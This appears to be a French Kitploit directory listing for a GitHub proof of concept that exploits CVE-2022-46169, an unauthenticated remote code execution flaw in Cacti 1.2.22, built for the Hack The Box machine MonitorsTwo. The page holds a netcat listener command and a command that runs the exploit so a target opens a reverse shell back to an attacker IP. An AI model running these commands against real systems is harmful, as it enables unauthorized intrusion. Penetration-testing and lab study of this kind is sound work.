Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2022-46169-Exploit — Exploit Python pour CVE-2022-46169 permettant une exécution de code à distance non authentifiée sur Cacti 1.2.22 via un reverse shell, destiné à des tests de pénétration éducatifs. | Kitploit
Outils/GitHubGitHub/0xzon/cve-2022-46169-exploit
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationOutil d'Accès à Distance
GitHub0xzon/cve-2022-46169-exploit

CVE-2022-46169-Exploit

Exploit Python pour CVE-2022-46169 permettant une exécution de code à distance non authentifiée sur Cacti 1.2.22 via un reverse shell, destiné à des tests de pénétration éducatifs.

Voir le dépôt
il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2022-46169 PoC - RCE non authentifié dans Cacti 1.2.22

Ce dépôt contient un exploit pour CVE-2022-46169, affectant Cacti 1.2.22. Cette vulnérabilité permet à un attaquant non authentifié d'exécuter du code arbitraire sur le système affecté.

Si vous souhaitez une analyse détaillée du fonctionnement de cet exploit, veuillez vous référer à cet article de Rapid7. Ils entrent dans les détails sur les spécificités.

J'ai écrit ce code, avec l'aide de chatGPT, pour une machine Hack The Box appelée MonitorsTwo à des fins éducatives.

Utilisation

root@kitploit:~
Arguments:
	-u URL of Cacti Application
	-lhost IP address of machine you want the shell on
	-lport Port of the machine you want the shell on

Configurez un listener sur votre machine locale avec netcat nc -lvnp 9001

Lancez l'exploit contre la cible python3 CVE-2022-46169.py -url http://10.10.11.211/ -lhost 10.10.14.3 -lport 9001

Avertissement

Cette preuve de concept (PoC) est destinée strictement à des fins éducatives et de test. Utiliser ce PoC sur tout système ou réseau sans autorisation explicite du propriétaire du système est illégal et peut entraîner des poursuites judiciaires. Le créateur décline toute responsabilité en cas de dommage découlant d'une utilisation correcte ou incorrecte de ce PoC. Utilisez-le à vos propres risques.

Références

https://chat.openai.com/

https://www.rapid7.com/db/vulnerabilities/debian-cve-2022-46169/

Télécharger l’outil